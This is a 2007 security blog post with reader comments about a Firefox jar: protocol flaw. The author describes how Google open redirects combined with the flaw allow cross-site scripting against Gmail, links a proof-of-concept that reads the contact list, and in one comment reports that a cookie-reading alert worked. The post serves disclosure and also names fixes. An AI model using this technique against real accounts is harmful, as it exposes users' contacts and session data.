Ehm!

November 10, 2007

Firefox jar: Protocol Vulnerability

Filed under: English, Security, XSS — Tags: , , , , , , — admin @ 10:47 am

I just came across pdp's finding jar protocol vulnerability on Mozilla Firefox, I think its a big issue, and the fact that it has been on bugzilla (#369814) for way more than ten fuck*ng days is not a good thing.

According to pdp, this issue makes vulnerable to Cross-site scripting applications that allow users uploading compressed ZIP, and JAR files. After a couple of minutes messing around the poc's, I figured out that sites with open redirect issues are vulnerable too. I've created this poc that attacks Gmail, it's based on my previous post and it will only show your contacts list, it's not being logged server side or anything (as some people thought that my previous poc did. Credit to tx for discovering the open redirect issue used to exploit Google / Firefox):

http://beford.org/stuff/jarjarbinks.htm

Who's fault? Both, Google for having open redirect issues and not fixing them, and Mozilla Corporation for failing to address this problem.

What can I do to protect myself? Giorgio Maone have already added protection against this flaw to NoScript development version.

Update: NoScript released stable version with Jar protection. A new bugzilla (#403331) entry was created to fix the inappropiate redirect on jar protocol, according to the lastest comments and bug keyword, there seems to be a patch and will be availible with Firefox 2.0.0.10.

21 Comments »

  1. [...] I was scratching my head this morning on the problem. Meanwhile, beford was light-years ahead of me. He managed to prove that open redirects on Google could lead to domain [...]

    Pingback by Severe XSS in Google and Others due to the JAR protocol issues | GNUCITIZEN — November 10, 2007 @ 11:41 am

  2. impressive, nice find!

    Comment by pdp — November 10, 2007 @ 11:52 am

  3. Boom! That’s a bombshell and a half….Nice find.

    Though its probably worth explaining (to people who don’t want to run the PoC) that the actual issue here that makes open redirects such an issue is that the jar: protocol following redirects, but doesn’t actually change the domain.

    So all redirects are vulnerable if you can get them to point to any zip file.

    Comment by kuza55 — November 10, 2007 @ 12:25 pm

  4. I just checked and redirects which use the Refresh header rather than the Location header seem to be immune.

    Comment by kuza55 — November 10, 2007 @ 12:31 pm

  5. [...] wild and the problem persists with the websites of Major Internet companies that includes Google. Beford.org has found a way to use the JAR exploit to get details of Google Accounts using a Malicious JAR file [...]

    Pingback by Firefox Security Threat - Google is vulnerable | dailyApps — November 12, 2007 @ 2:21 pm

  6. s/languaje/language/ on jarjarbinks.htm.

    Comment by Nicolas — November 12, 2007 @ 7:56 pm

  7. Nicolas: Thanks, fixed.

    Comment by beford — November 13, 2007 @ 6:02 am

  8. [...] reported by Jesse Ruderman in February, and its redirect variant discovered and popularized by Beford with a nice Google-targeted proof of concept, spawned some interesting 3rd party coverage. Interesting, because very few of the 3rd party [...]

    Pingback by hackademix.net » A Jar of Misleading Advices — November 13, 2007 @ 1:21 pm

  9. [...] dla Googleplex, prosz?c o dodatkowe informacje na temat wykorzystania tej luki. Na portalu beford.org mo?emy przeczyta? na temat sposobu w jaki luka mo?e zosta? wykorzystana w celu przej?cia listy [...]

    Pingback by Luka w Firefoksie obejmuje u?ytkowników Gmail - IT Blog — November 14, 2007 @ 10:18 am

  10. [...] security researcher, beford, found the .jar problem being compounded by open redirect issues at Google that have yet to be [...]

    Pingback by Security Tips » Jarring Firefox Exploit Endangers Google Accounts — November 14, 2007 @ 2:23 pm

  11. i could not manipulate cookies.
    it only affects csrf ?

    Comment by Luca — November 14, 2007 @ 4:13 pm

  12. [...] ?e spraw? zainteresowa? Micha? Zalewski. Obecnie pracuje on dla Googleplex. Na portalu beford.org znajduje si? opis sposobu w jaki luka mo?e zosta? wykorzystana do przej?cia listy kontaktów z [...]

    Pingback by Luka w Firefoksie obejmuje u?ytkowników Gmail | thecamels.org — November 14, 2007 @ 9:48 pm

  13. [...] impact at GNUCitizen. This opens this bug up to a whole new audience and…2007-11-10 – Beford illustrates the seriousness of this issue and issues in the same family by targeting Google and Gmail and posts a new bug entry.2007-11-10 – And then Mario posts at [...]

    Pingback by ICMPECHO » Blog Archive » Firefox JAR: vulnerability - quick summary — November 15, 2007 @ 12:22 am

  14. [...] w Googleplex, prosz?c o dodatkowe informacje na temat wykorzystania tej luki. Na portalu beford.org mo?emy przeczyta? na temat sposobu w jaki luka mo?e zosta? wykorzystana w celu przej?cia listy [...]

    Pingback by XAM » Blog Archive » Luka w Firefoksie obejmuje u?ytkowników Gmail — November 15, 2007 @ 1:52 am

  15. Luca: You should be able to read cookies, I didn’t try too hard but my first test with Gmail was a simple alert(document.cookies) and It worked.

    Comment by beford — November 16, 2007 @ 6:49 am

  16. [...] The GMail proof-of-concept is available here. [...]

    Pingback by Ryan Naraine’s Zero Day mobile edition — November 17, 2007 @ 1:50 am

  17. [...] Beford.org’a göre tehlike, Firefox’un ?u aç???yla birlikte, Gmail’in de bir tedbirsizli?inden kaynaklan?yor. Aç???n kullan?c?ya etkisi daha geni? olabilir, ancak ?u ana kadarki -haberimiz olan- en belirgin uygulamas? beford.org’nin sayfas?ndan. Denemek isterseniz o sayfadan http://beford.org/stuff/jarjarbinks.htm yazan ba?lant?ya t?klayabilirsiniz, biz burada o ba?lant?y? vermeyece?iz. Denedik ve… [...]

    Pingback by Firefox aç???ndan Gmail k?r?labilir | www.dahii.com — November 19, 2007 @ 6:09 am

  18. [...] Beford.org’a göre tehlike, Firefox’un ?u aç???yla birlikte, Gmail’in de bir tedbirsizli?inden kaynaklan?yor. Aç???n kullan?c?ya etkisi daha geni? olabilir, ancak ?u ana kadarki -haberimiz olan- en belirgin uygulamas? beford.org’nin sayfas?ndan. Denemek isterseniz o sayfadan http://beford.org/stuff/jarjarbinks.htm yazan ba?lant?ya t?klayabilirsiniz, biz burada o ba?lant?y? vermeyece?iz. Denedik ve… [...]

    Pingback by   Firefox aç???ndan Gmail k?r?labilir — Bili?imin do?ru adresi… — November 19, 2007 @ 9:55 am

  19. [...] JAR Vulnerability Continues — Link to Gmail POC November 19, 2007 Firefox jar: Protocol Vulnerability: According to pdp, this issue makes vulnerable to Cross-site scripting applications that allow [...]

    Pingback by Firefox JAR Vulnerability Continues — Link to Gmail POC « lucky13 — November 19, 2007 @ 4:07 pm

  20. [...] evidenziare che in rete è stato pubblicato un proof of concept che dimostra l’exploit di entrambe le problematiche in un attacco contro il popolare servizio [...]

    Pingback by BlogZilla » Falla "JAR:" per Firefox, XSS per Gmail — November 21, 2007 @ 10:14 am

  21. [...] Corporation just released Firefox 2.0.0.10 which includes fixes against JAR uri attacks. This issue affected browsers that used Gecko engine, a quick check showed me that only K-meleon [...]

    Pingback by beford.org » Firefox 2.0.0.10 released — November 27, 2007 @ 5:41 am

RSS feed for comments on this post. TrackBack URL

Leave a comment

Powered by WordPress